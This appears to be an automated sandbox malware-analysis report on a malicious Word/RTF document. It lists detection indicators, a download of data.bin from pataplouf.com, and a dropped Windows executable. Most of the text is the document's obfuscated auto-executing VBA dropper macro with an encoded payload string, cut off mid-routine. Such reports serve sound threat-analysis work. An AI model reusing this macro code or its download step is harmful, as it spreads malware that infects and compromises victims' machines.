Tortor PC.contractq01rh.17o-o34u53j.rtf
This report is generated from a file or URL submitted to this webservice on August 8th 2016 15:49:02 (UTC) and action script Heavy Anti-Evasion
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by Falcon Sandbox v5.00 © Hybrid Analysis
Incident Response
Risk Assessment
- Network Behavior
- Contacts 1 domain and 1 host.
Indicators
Not all malicious and suspicious indicators are displayed.
-
Malicious Indicators 9
-
External Systems
-
Detected Emerging Threats Alert
- details
- Detected alert "ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin" (SID: 2018052, Rev: 6, Severity: 1) categorized as "A Network Trojan was detected" (Phishing, Exploit Kits)
- source
- Suricata Alerts
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 2/53 Antivirus vendors marked sample as malicious (3% detection rate)
- source
- External System
- relevance
- 8/10
-
General
-
Document spawns new processes
- details
- Document spawned a new process (macro present)
- source
- Indicator Combinations
- relevance
- 7/10
-
GETs files from a webserver
- details
-
"GET /data.bin HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: pataplouf.com
Connection: Keep-Alive"
- source
- Network Traffic
- relevance
- 10/10
-
Installation/Persistence
-
Found indicators of dropper code in the commandline
- details
-
Found "... =16" "WLa3.SEnd()" "Of0e3 ..." on invoke of cmd.exe
Found "... ZxmzF WLa3.RESpONsEBOdY" "PQrK=83 ..." on invoke of cmd.exe
Found "... " "FPiAJMz.SaveToFIlE MgWH & C5 ..." on invoke of cmd.exe
- source
- Monitored Target
- relevance
- 5/10
-
Shows malicious Office specific indicators
- details
- The file contains VBA macros and spawned processes in a way typical for malicious Office files
- source
- Indicator Combinations
- relevance
- 10/10
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "213.186.33.168" (ASN: 16276, Owner: OVH SAS): ...
- source
- Network Traffic
- relevance
- 10/10
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "Document_Open" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
-
Document contacts a domain
- details
- This kind of behavior is often seen on document exploits or macros utilized as a dropper
- source
- Indicator Combinations
- relevance
- 3/10
-
Suspicious Indicators 10
-
Installation/Persistence
-
Drops executable files
- details
- "000.RTV" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\staticcache.dat"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db"
"WINWORD.EXE" touched file "C:\Windows\system32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\system32\en-US\KERNELBASE.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{970CBB03-0673-49D2-8698-D021578856D1}.tmp"
"WINWORD.EXE" touched file "C:\Windows\system32\en-US\MSCTF.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{186E8465-14E4-4EBF-8240-D549FE14F488}.tmp"
- source
- API Call
- relevance
- 7/10
-
Network Related
-
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
- source
- Network Traffic
- relevance
- 10/10
-
System Security
-
Hooks API calls
- details
-
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
- source
- Hook Detection
- relevance
- 10/10
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
- Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls"
- source
- Static Parser
- relevance
- 10/10
-
Contains embedded string with suspicious keywords
- details
-
Found suspicious keyword "Lib" which indicates: "May run code from a DLL"
Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings"
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls"
Found suspicious keyword "Windows" which indicates: "May enumerate application windows (if combined with Shell.Application object)"
- source
- File/Memory
- relevance
- 10/10
-
Installs hooks/patches the running process
- details
-
- source
- Hook Detection
- relevance
- 10/10
-
Hiding 3 Suspicious Indicators
-
Informative 11
-
General
-
Contacts domains
- details
- "pataplouf.com"
- source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
- "213.186.33.168:80"
- source
- Network Traffic
- relevance
- 1/10
-
Contains embedded VBA macros
- details
-
File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: "Dim EFJ() As Integer
Dim UHxM(13112 - 4112) As Long, B1D(19879 - 9880) As Long
Private Function IKJ(ByVal KQwUl As Variant) As Long
Omecz = 45
Select Case Omecz
Case 95
Omecz = Omecz + 1
Case 46
Omecz = Omecz + Omecz
Case Else
Omecz = Omecz - 1
End Select
On Error GoTo KA
G7izc = 72
Select Case G7izc
Case 61
G7izc = G7izc + 1
Case 96
G7izc = G7izc + G7izc
Case Else
G7izc = G7izc - 1
End Select
Dim XNfD As Long, XTXs As Variant
ApU = 61
Select Case ApU
Case 9
ApU = ApU + 1
Case 20
ApU = ApU + ApU
Case Else
ApU = ApU - 1
End Select
Do
XTXs = KQwUl(XNfD)
XNfD = XNfD + 1
Loop
FtOlE = 72
Select Case FtOlE
Case 1
FtOlE = FtOlE + 1
Case 42
FtOlE = FtOlE + FtOlE
Case Else
FtOlE = FtOlE - 1
End Select
KA:
GJg = 64
Select Case GJg
Case 27
GJg = GJg + 1
Case 39
GJg = GJg + GJg
Case Else
GJg = GJg - 1
End Select
If XNfD = 0 Then Exit Function
QCC = 72
Select Case QCC
Case 86
QCC = QCC + 1
Case 45
QCC = QCC + QCC
Case Else
QCC = QCC - 1
End Select
IKJ = XNfD - 1
JzdMN = 27
Select Case JzdMN
Case 75
JzdMN = JzdMN + 1
Case 5
JzdMN = JzdMN + JzdMN
Case Else
JzdMN = JzdMN - 1
End Select
End Function
Private Function Ytj(ByVal FpOmG6 As String, ByVal Im As Long, ByVal Xb As Variant) As String
FvU = 61
Select Case FvU
Case 1
FvU = FvU + 1
Case 55
FvU = FvU + FvU
Case Else
FvU = FvU - 1
End Select
Dim Sm8() As Byte, AB0() As Byte, O0O2LcO As Long, BZ As Long
IJQ = 97
Select Case IJQ
Case 24
IJQ = IJQ + 1
Case 44
IJQ = IJQ + IJQ
Case Else
IJQ = IJQ - 1
End Select
Sm8 = FpOmG6
LSlGnZp = 91
Select Case LSlGnZp
Case 43
LSlGnZp = LSlGnZp + 1
Case 86
LSlGnZp = LSlGnZp + LSlGnZp
Case Else
LSlGnZp = LSlGnZp - 1
End Select
O0O2LcO = IKJ(Sm8)
E3FoiM = 98
Select Case E3FoiM
Case 49
E3FoiM = E3FoiM + 1
Case 70
E3FoiM = E3FoiM + E3FoiM
Case Else
E3FoiM = E3FoiM - 1
End Select
Im = (Im - 1) * 2
J5EI1k = 67
Select Case J5EI1k
Case 81
J5EI1k = J5EI1k + 1
Case 84
J5EI1k = J5EI1k + J5EI1k
Case Else
J5EI1k = J5EI1k - 1
End Select
Xb = (Xb * 2) - 1
Yyj = 43
Select Case Yyj
Case 30
Yyj = Yyj + 1
Case 92
Yyj = Yyj + Yyj
Case Else
Yyj = Yyj - 1
End Select
If Im + Xb > O0O2LcO Then Xb = O0O2LcO - Im
Av0NQ = 85
Select Case Av0NQ
Case 57
Av0NQ = Av0NQ + 1
Case 82
Av0NQ = Av0NQ + Av0NQ
Case Else
Av0NQ = Av0NQ - 1
End Select
ReDim AB0(Xb)
QkOhm = 90
Select Case QkOhm
Case 95
QkOhm = QkOhm + 1
Case 35
QkOhm = QkOhm + QkOhm
Case Else
QkOhm = QkOhm - 1
End Select
For BZ = Im To Im + Xb
AB0(BZ - Im) = Sm8(BZ)
Next BZ
Id1 = 37
Select Case Id1
Case 83
Id1 = Id1 + 1
Case 18
Id1 = Id1 + Id1
Case Else
Id1 = Id1 - 1
End Select
Ytj = AB0
BV = 50
Select Case BV
Case 92
BV = BV + 1
Case 17
BV = BV + BV
Case Else
BV = BV - 1
End Select
End Function
Private Function NUKOe(Kcua, TzNOo)
NUKOe = Kcua - (TzNOo * (Kcua \ TzNOo))
End Function
Private Function V9rjJ(QYn As Long, WTRXBf As Long) As Byte
Mn2tjQ = 29
Select Case Mn2tjQ
Case 93
Mn2tjQ = Mn2tjQ + 1
Case 27
Mn2tjQ = Mn2tjQ + Mn2tjQ
Case Else
Mn2tjQ = Mn2tjQ - 1
End Select
Dim QoWvn As Long, T4OMnqL As Long
Nuk = 61
Select Case Nuk
Case 50
Nuk = Nuk + 1
Case 84
Nuk = Nuk + Nuk
Case Else
Nuk = Nuk - 1
End Select
For QoWvn = (468000 / 9750) To (3012 - 2955)
If Ytj(QYn, WTRXBf, 1) = T4OMnqL Then V9rjJ = QoWvn: Exit For
T4OMnqL = T4OMnqL + 1
Next QoWvn
TCYLnc = 44
Select Case TCYLnc
Case 76
TCYLnc = TCYLnc + 1
Case 78
TCYLnc = TCYLnc + TCYLnc
Case Else
TCYLnc = TCYLnc - 1
End Select
End Function
Private Function RPSDiS(YLRF, PIy043)
YQ74m = 5
Select Case YQ74m
Case 6
YQ74m = YQ74m + 1
Case 3
YQ74m = YQ74m + YQ74m
Case Else
YQ74m = YQ74m - 1
End Select
RPSDiS = (YLRF And Not PIy043) Or (Not YLRF And PIy043)
RU = 73
Select Case RU
Case 98
RU = RU + 1
Case 97
RU = RU + RU
Case Else
RU = RU - 1
End Select
End Function
Private Function W55F(ByVal LEkYl9 As Integer) As String
KzPA = 77
Select Case KzPA
Case 33
KzPA = KzPA + 1
Case 92
KzPA = KzPA + KzPA
Case Else
KzPA = KzPA - 1
End Select
Dim RJLm6f(1) As Byte, GCqPE As Byte, Y3cUd As Byte
P6G = 34
Select Case P6G
Case 77
P6G = P6G + 1
Case 1
P6G = P6G + P6G
Case Else
P6G = P6G - 1
End Select
If LEkYl9 < 0 Then Exit Function
BxoG = 39
Select Case BxoG
Case 61
BxoG = BxoG + 1
Case 49
BxoG = BxoG + BxoG
Case Else
BxoG = BxoG - 1
End Select
If LEkYl9 > (2095590 / 8218) Then
Gznk = 96
Select Case Gznk
Case 29
Gznk = Gznk + 1
Case 57
Gznk = Gznk + Gznk
Case Else
Gznk = Gznk - 1
End Select
Y3cUd = 0
Else
UlequE = 90
Select Case UlequE
Case 21
UlequE = UlequE + 1
Case 83
UlequE = UlequE + UlequE
Case Else
UlequE = UlequE - 1
End Select
GCqPE = LEkYl9
K87e6NW = 89
Select Case K87e6NW
Case 76
K87e6NW = K87e6NW + 1
Case 89
K87e6NW = K87e6NW + K87e6NW
Case Else
K87e6NW = K87e6NW - 1
End Select
Y3cUd = 0
DrY = 32
Select Case DrY
Case 61
DrY = DrY + 1
Case 47
DrY = DrY + DrY
Case Else
DrY = DrY - 1
End Select
End If
XTDfFuA = 8
Select Case XTDfFuA
Case 7
XTDfFuA = XTDfFuA + 1
Case 82
XTDfFuA = XTDfFuA + XTDfFuA
Case Else
XTDfFuA = XTDfFuA - 1
End Select
RJLm6f(0) = GCqPE
Czd0uPj = 34
Select Case Czd0uPj
Case 42
Czd0uPj = Czd0uPj + 1
Case 91
Czd0uPj = Czd0uPj + Czd0uPj
Case Else
Czd0uPj = Czd0uPj - 1
End Select
RJLm6f(1) = Y3cUd
AxLZ = 31
Select Case AxLZ
Case 24
AxLZ = AxLZ + 1
Case 46
AxLZ = AxLZ + AxLZ
Case Else
AxLZ = AxLZ - 1
End Select
W55F = RJLm6f
Uk = 74
Select Case Uk
Case 20
Uk = Uk + 1
Case 10
Uk = Uk + Uk
Case Else
Uk = Uk - 1
End Select
End Function
Private Sub DOCument_OpEn()
Gtv = 74
Select Case Gtv
Case 6
Gtv = Gtv + 1
Case 13
Gtv = Gtv + Gtv
Case Else
Gtv = Gtv - 1
End Select
On Error Resume Next
WiPnr = 49
Select Case WiPnr
Case 34
WiPnr = WiPnr + 1
Case 81
WiPnr = WiPnr + WiPnr
Case Else
WiPnr = WiPnr - 1
End Select
Dim CVxSk5P As Long, R6r79L As Long, ANn As Long
FtU3 = 90
Select Case FtU3
Case 57
FtU3 = FtU3 + 1
Case 83
FtU3 = FtU3 + FtU3
Case Else
FtU3 = FtU3 - 1
End Select
CVxSk5P = 91370
WjA9KZx = 43
Select Case WjA9KZx
Case 66
WjA9KZx = WjA9KZx + 1
Case 43
WjA9KZx = WjA9KZx + WjA9KZx
Case Else
WjA9KZx = WjA9KZx - 1
End Select
For R6r79L = 1 To CVxSk5P
ANn = ANn + 1
Next R6r79L
Nf = 53
Select Case Nf
Case 81
Nf = Nf + 1
Case 23
Nf = Nf + Nf
Case Else
Nf = Nf - 1
End Select
If ANn = CVxSk5P Then
B1tv75A = 8
Select Case B1tv75A
Case 83
B1tv75A = B1tv75A + 1
Case 2
B1tv75A = B1tv75A + B1tv75A
Case Else
B1tv75A = B1tv75A - 1
End Select
Dim JKGA As Integer, JnimVG1 As String
For JKGA = 5 To 398
JnimVG1 = JnimVG1 + JKGA
Next
NaB16k = 89
Select Case NaB16k
Case 86
NaB16k = NaB16k + 1
Case 95
NaB16k = NaB16k + NaB16k
Case Else
NaB16k = NaB16k - 1
End Select
MwlL5KT
Else
AzpLwA7 = 49
Select Case AzpLwA7
Case 19
AzpLwA7 = AzpLwA7 + 1
Case 11
AzpLwA7 = AzpLwA7 + AzpLwA7
Case Else
AzpLwA7 = AzpLwA7 - 1
End Select
NIg
Pfk = 78
Select Case Pfk
Case 32
Pfk = Pfk + 1
Case 96
Pfk = Pfk + Pfk
Case Else
Pfk = Pfk - 1
End Select
End If
GZ = 68
Select Case GZ
Case 88
GZ = GZ + 1
Case 92
GZ = GZ + GZ
Case Else
GZ = GZ - 1
End Select
End Sub
Private Function FXZ1Aht(DnXRUV As Integer) As Byte()
FLtCr = 75
Select Case FLtCr
Case 78
FLtCr = FLtCr + 1
Case 96
FLtCr = FLtCr + FLtCr
Case Else
FLtCr = FLtCr - 1
End Select
Dim Tf14c(1) As Byte, LWn90 As Long, CP5oVH0 As Byte
SC = 25
Select Case SC
Case 5
SC = SC + 1
Case 65
SC = SC + SC
Case Else
SC = SC - 1
End Select
For LWn90 = 0 To 1
Tf14c(LWn90) = (Int(DnXRUV / (2 ^ ((7260 - 7252) * (1 - LWn90))))) And (-202 + 457)
Next LWn90
KzR3Cw = 19
Select Case KzR3Cw
Case 88
KzR3Cw = KzR3Cw + 1
Case 53
KzR3Cw = KzR3Cw + KzR3Cw
Case Else
KzR3Cw = KzR3Cw - 1
End Select
ReDim FXZ1Aht(1) As Byte
JXE = 33
Select Case JXE
Case 32
JXE = JXE + 1
Case 8
JXE = JXE + JXE
Case Else
JXE = JXE - 1
End Select
For LWn90 = 0 To 1 \ 2
CP5oVH0 = Tf14c(LWn90)
Tf14c(LWn90) = Tf14c(1 - LWn90)
Tf14c(1 - LWn90) = CP5oVH0
Next
U6BDRF = 60
Select Case U6BDRF
Case 24
U6BDRF = U6BDRF + 1
Case 57
U6BDRF = U6BDRF + U6BDRF
Case Else
U6BDRF = U6BDRF - 1
End Select
FXZ1Aht = Tf14c
TarqAL = 44
Select Case TarqAL
Case 38
TarqAL = TarqAL + 1
Case 81
TarqAL = TarqAL + TarqAL
Case Else
TarqAL = TarqAL - 1
End Select
End Function
Private Sub MwlL5KT()
Sym = 34
Select Case Sym
Case 52
Sym = Sym + 1
Case 97
Sym = Sym + Sym
Case Else
Sym = Sym - 1
End Select
Dim W5l As String
Ooh = 37
Select Case Ooh
Case 82
Ooh = Ooh + 1
Case 46
Ooh = Ooh + Ooh
Case Else
Ooh = Ooh - 1
End Select
NQFe = 1
Select Case NQFe
Case 39
NQFe = NQFe + 1
Case 76
NQFe = NQFe + NQFe
Case Else
NQFe = NQFe - 1
End Select
W5l = "-27043&14415&8326&15111&-7018&1054&-2649&15607&30892&-7385&-28986&-25402&-13300&-12964&2799&13518&-32530&-8179&2239&7087&-12293&13952&-25382&11135&-12149&-20524&8421&19043&9135&-22108&-28164&-15234&-19013&-15539&-20081&32565&-26104&-22857&7564&-29154&7398&-22417&-9467&-31325&-1879&29799&22649&11974&-21962&-22704&31095&26488&-23004&-10798&31566&16779&17515&-7116&-25361&-14170&-10816&6439&6161&-1641&-7119&32543&29357&-7324&26629&28884&-19816&25372&-29400&-28198&-30899&-13395&-29674&-31318&21966&-2729&-23105&26843&-7247&13532&28640&10632&29341&24525&-25486&-3732&-27377&25582&-30879&18830&16596&13614&-21651&21361&-27277&-14915&-17589&-27448&-5774&14180&16121&-10335&-26203&11367&16902&26910&-24521&519&-14946&21474&-13625&13282&-24776&-10688&6478&-9377&-30345&7453&-906&-11277&12591&23228&"
K7Iu = 90
Select Case K7Iu
Case 8
K7Iu = K7Iu + 1
Case 9
K7Iu = K7Iu + K7Iu
Case Else
K7Iu = K7Iu - 1
End Select
W5l = W5l & "-20442&15687&-8504&28639&-24839&15295&2633&-11428&-16744&26423&29273&-1078&8041&-2574&-20736&19565&-14934&18374&-20238&-27297&23518&32192&2041&19798&30659&2436&8891&14702&-21543&9040&12865&-25666&-22377&9546&-12195&-4720&-18253&28103&-20480&-24665&2137&-6838&24923&6516&14294&3984&-28374&1778&-11100&-19981&-26007&-2583&1080&-2657&-31791&27113&-6819&-4534&-28250&20334&27674&-18217&-7510&-23998&1181&9068&-27371&-25127&12175&11457&31946&-14397&-18811&25103&30387&14356&8291&-21184&-19140&-28722&18198&-19644&-18603&-15746&5782&31495&31195&2713&-30601&-24333&-11155&28348&-17400&4818&-13434&-12881&9640&9040&-7596&20256&-18659&7563&22654&-6530&15626&-678&18599&-7402&2238&15487&-27817&-4600&-11320&7120&-22250&22680&-28292&-7654&17753&31923&13388&32028&6186&27787&-26860&31558&27305&28963&-630&"
Ch6Z9d = 4
Select Case Ch6Z9d
Case 43
Ch6Z9d = Ch6Z9d + 1
Case 25
Ch6Z9d = Ch6Z9d + Ch6Z9d
Case Else
Ch6Z9d = Ch6Z9d - 1
End Select
W5l = W5l & "20587&590&-18464&-26363&-30223&-4953&-32412&28180&-21407&-10577&-7242&11731&22392&-1899&-28556&-12419&24278&5932&-10159&-1495&-10378&-28882&-16017&-17664&17970&-3218&-14005&-9362&19986&-12123&9926&21412&-24890&-18014&-27258&-12119&-29091&-4082&-14016&24677&-21614&-2592&10516&-21486&28461&-22874&27129&5821&-9922&20742&30893&-14870&-29666&31358&-3246&25926&-22204&-20006&-19600&-29859&-29783&-4864&13761&25619&-14964&-19640&3416&29349&-22682&21106&-15038&8234&-25886&-28143&-7824&-3459&-23803&14044&6752&652&4100&-31498&-7968&5055&-28065&-2334&10529&17597&-11540&5001&-15381&-6260&10448&14712&21453&-6287&-15938&27460&-17260&-26869&24618&-18081&-14360&-17099&1460&-4294&16365&-1783&13556&29397&2634&-12168&8152&20496&-32728&5093&15443&-5090&15004&31359&-29035&-14152&-26724&19481&-3781&-11514&"
KM8PlK = 95
Select Case KM8PlK
Case 4
KM8PlK = KM8PlK + 1
Case 54
KM8PlK = KM8PlK + KM8PlK
Case Else
KM8PlK = KM8PlK - 1
End Select
W5l = W5l & "7706&10031&19303&9992&17837&-23820&2508&-1415&12467&-26018&-11843&7438&4721&-2072&11580&-29222&-15317&3134&-2625&-8575&-14453&-28744&20722&-30005&25414&-5070&22702&-30936&27730&-2530&-21598&-7569&26695&-7925&23778&-15598&21794&28867&-25417&-11361&4427&6044&2255&-4174&23989&4136&22993&8337&-27291&18501&-25916&2511&-8858&-26036&16931&12341&-28732&-23505&7575&-18812&1850&-23827&-3444&-23470&-15684&-21673&19390&14112&-22327&2011&-7470&-5238&-3657&29926&-28611&-18710&24276&-29695&18484&-20651&8611&21928&12527&13145&24936&-14552&-11106&5665&-27264&-22197&-25608&27413&20566&-31899&30425&13908&26148&7921&19222&-28754&6643&-30232&32107&15211&15255&32174&-2462&14407&8505&25230&13657&11802&-18856&2213&24222&-16735&-5373&27441&10280&-28907&-1036&-7302&27576&-28659&20025&-27236&29292&21456&16278"
SKJtj = 57
Select Case SKJtj
Case 46
SKJtj = SKJtj + 1
Case 81
SKJtj = SKJtj + SKJtj
Case Else
SKJtj = SKJtj - 1
End Select
W5l = W5l & "&32762&-1745&-18080&12201&-12489&-6584&30573&-25954&-25559&12921&19919&-26844&-25019&-4190&6990&-5192&-20465&-15997&-16457&-30569&-28099&-11908&-5500&-18842&23928&20528&-3477&-1531&-24221&-12266&10387&-19342&-14651&-6092&-3925&9573&-848&4631&-25098&-636&-8382&-8930&31898&32291&31889&19916&27280&28605&30738&-22920&25696&-30191&-19656&20388&-5661&15587&-27070&-5229&21235&-31517&22226&-19529&7859&-32605&11896&15020&-32153&-29485&6391&-19165&22165&27848&-12100&553&-21594&-26588&17236&-5687&14361&-6640&6564&-30945&28480&23210&-14748&-26986&-11362&-11625&4882&24456&-11115&28402&-18871&711&3688&-28190&19886&-9526&6435&20959&-246&4458&-10522&19666&13127&24152&1214&-25703&-32028&21190&-30177&2191&9272&-24677&-31087&7141&-13789&7473&5896&-1980&13528&13426&-7326&-210&11367&26812&31414&774&5730"
Yucd = 72
Select Case Yucd
Case 1
Yucd = Yucd + 1
Case 16
Yucd = Yucd + Yucd
Case Else
Yucd = Yucd - 1
End Select
W5l = W5l & "&-4716&-6981&543&-10964&24333&8440&15412&17247&21442&-15323&-19491&-19332&11830&-26062&18117&-6790&-23711&18187&24021&-23815&-30732&6765&-13549&-22068&632&24018&22275&9584&25285&-11087&505&-24551&8584&26923&14346&-12365&-7297&26116&22086&-25147&-26060&1400&9959&22918&-17205&-24782&12356&-18319&-772&7682&-25674&-31144&-4081&19001&19214&2125&12347&-22592&-18822&24570&9032&11114&-4047&25145&17893&-10633&4515&-4302&18045&-25613&-25922&28713&23575&1791&-280&1703&12296&-2070&2016&-18973&-29030&-30842&-5261&11711&-20004&30329&9963&29280&3275&21795&26044&25093&-6409&-25422&-18729&22789&-1105&9834&-7556&29699&15331&-23049&12595&-30249&-19260&-26688&4282&27396&8937&-12255&-9669&-6703&27155&2825&17612&-29720&7982&21368&-32394&16869&1359&23968&-6568&24892&-31902&30473&-24381&-25576&25362&-29417"
Kje1h = 24
Select Case Kje1h
Case 85
Kje1h = Kje1h + 1
Case 76
Kje1h = Kje1h + Kje1h
Case Else
Kje1h = Kje1h - 1
End Select
W5l = W5l & "&5863&31106&-30707&7623&15376&-17175&14076&3568&3455&-27325&28670&2256&11059&-26755&8537&7787&-15718&11903&16457&12624&29477&-16443&6303&21663&-2085&-13403&5795&-24475&-25332&17950&18401&5273&20630&-14470&-6995&-31903&-363&26920&23437&21901&16459&-28712&22972&-13867&-6811&9089&3813&-21512&-20017&9583&13838&27224&32247&3985&-7275&801&25398&4213&-20345&5698&-3976&-13985&1298&-20327&-32259&-28866&-32509&-15355&16850&14322&-19140&-4766&-24626&-13801&28270&-18432&-21224&25283&3283&-12576&15403&-15803&21546&7933&30551&8491&-6964&13422&-23716&-31666&18716&-26733&-27168&24977&3911&4682&-941&-13516&-4117&-24179&12844&29390&-16913&4781&-17457&-27826&-28276&-31250&-3337&-1889&-13889&32053&-22890&14943&-4116&-3985&18066&25695&-8380&9473&17717&8325&25674&-15992&-3163&29212&-10760&-12598&-22357&-"
RMe8jEf = 44
Select Case RMe8jEf
Case 73
RMe8jEf = RMe8jEf + 1
Case 59
RMe8jEf = RMe8jEf + RMe8jEf
Case Else
RMe8jEf = RMe8jEf - 1
End Select
W5l = W5l & "19939&-10335&32473&30994&1097&15165&-9443&-1340&17896&25964&-8520&-21146&25178&-17070&27913&11323&-31665&15814&22372&-871&-4184&-10594&-9263&6281&-13441&-26199&-12775&18765&8243&-6540&18189&-20317&30008&29681&18534&11054&-15710&-12026&-10534&25905&3223&20974&7349&-20427&396&19967&31588&-30551&-20969&17162&-18856&-27499&11945&-1196&19521&-10883&-21886&-23315&26551&-25797&-20176&18807&-8800&-27732&-3990&-15252&28777&-20937&7148&772&12675&-32591&20210&21275&-28461&30700&-4935&19643&22385&18578&-11764&23156&-3844&-14255&5619&3142&13306&15485&-14280&16657&6183&18177&30160&-7367&-26912&-2676&7481&10411&-21503&-31617&-5499&10881&-24453&-28402&25118&12910&-18578&-2046&2283&-3964&-9487&14268&32296&-17620&-9223&15612&17738&10636&19266&-1802&20625&19494&27738&18424&27503&-17582&21943&11391&106"
VKhT9 = 48
Select Case VKhT9
Case 1
VKhT9 = VKhT9 + 1
Case 17
VKhT9 = VKhT9 + VKhT9
Case Else
VKhT9 = VKhT9 - 1
End Select
W5l = W5l & "07&-31981&13148&-8125&29391&-19903&4535&21105&3198&-19565&25719&19598&-16920&-3852&23334&14147&22676&17592&-10805&28811&-29932&-6980&4380&-30633&13689&32596&20148&13242&-12798&16757&-59&-19224&-13360&-12671&-13418&5793&-15707&3543&-24822&-19509&-30869&-28154&27719&28405&-31815&-2980&-23066&-4454&-6723&31000&-1350&-7490&15087&-28123&-30383&-4899&-1175&-18825&-8179&25026&-32652&-11683&27934&21182&4894&-12293&-19402&-27268&25126&-10848&-2185&-26023&14732&4391&2065&-7887&7925&-8239&16241&26804&-23707&-6523&26750&9508&28332&2226&19371&-4712&25568&26159&-15725&-16078&-10856&18462&-27989&10429&14003&-13938&-22983&772&-32147&1927&22496&6660&-24072&20248&-7487&25576&13558&-26979&3752&391&2094&-25495&-22720&27222&-31211&-21665&-30006&-14884&14818&17281&-30488&28378&-24608&-23785&-26303&22774&"
DV1rN8V = 70
Select Case DV1rN8V
Case 5
DV1rN8V = DV1rN8V + 1
Case 28
DV1rN8V = DV1rN8V + DV1rN8V
Case Else
DV1rN8V = DV1rN8V - 1
End Select
W5l = W5l & "-4252&-14019&-26961&-5635&-22656&1306&22136&-21073&3146&-9966&-29897&-30558&-16669&29750&-31187&1707&-502&-8092&-17621&-28431&29463&-9182&28432&-32561&-6670&19299&-5436&11923&26253&-9796&-17863&19104&30061&-28814&-1666&12373&31365&-24723&10841&25455&9553&2053&-11603&20545&-19883&3641&8139&18546&-4789&21387&-28745&31292&23371&-25300&-4830&3823&21270&27759&18885&20085&-16283&-21604&10077&3916&25020&-20460&24092&-4751&-13971&3326&31342&-31391&-2316&-30160&20110&24843&-26463&4774&11423&30650&-27405&-20434&25257&13812&-6472&-17826&-32674&30851&11023&-23351&-18215&-8845&-15142&-9735&21364&-2916&-11848&27868&-18628&15061&28172&19296&5891&-14439&21240&-1962&24127&17662&5427&23496&8498&-7207&12124&8530&13179&-31247&-13595&24203&10466&-13668&23026&32722&14596&-685&-29399&-2388&17450&-8753&939"
NNR = 47
Select Case NNR
Case 40
NNR = NNR + 1
Case 62
NNR = NNR + NNR
Case Else
NNR = NNR - 1
End Select
W5l = W5l & "8&-10526&-20539&-18875&-7074&31686&-6183&1689&31517&-17839&-21755&10173&-19924&-9174&-6833&-9863&5675&-2261&-17782&3157&-6694&5973&20176&5324&3762&-20168&-27768&-19213&11171&11755&9331&15555&-25000&3010&-7881&-3942&-24111&12884&12687&-8044&-6556&25921&1949&-179&-28104&-15017&884&-27476&-5165&-7140&9144&19641&18639&19392&-27840&25652&21355&29611&-9607&32576&-5876&7851&-615&31460&-13327&18817&-18788&12752&-7429&3520&20532&-28611&-28390&25617&-28697&-754&-11279&3050&31941&31823&-16841&-22416&-22987&-1686&-22914&16694&6946&-15229&19784&-21002&-28825&-26119&32301&28135&-23760&23436&-5603&-14697&12851&-10009&-15122&-20594&-4664&-26617&24611&10394&14918&-7448&-20302&-17983&32582&5323&-254&-32491&-4260&-20284&-664&-31341&-97&12442&23797&-16986&4453&14892&-14092&-13023&-29334&753&24327&-3091"
Re = 1
Select Case Re
Case 29
Re = Re + 1
Case 70
Re = Re + Re
Case Else
Re = Re - 1
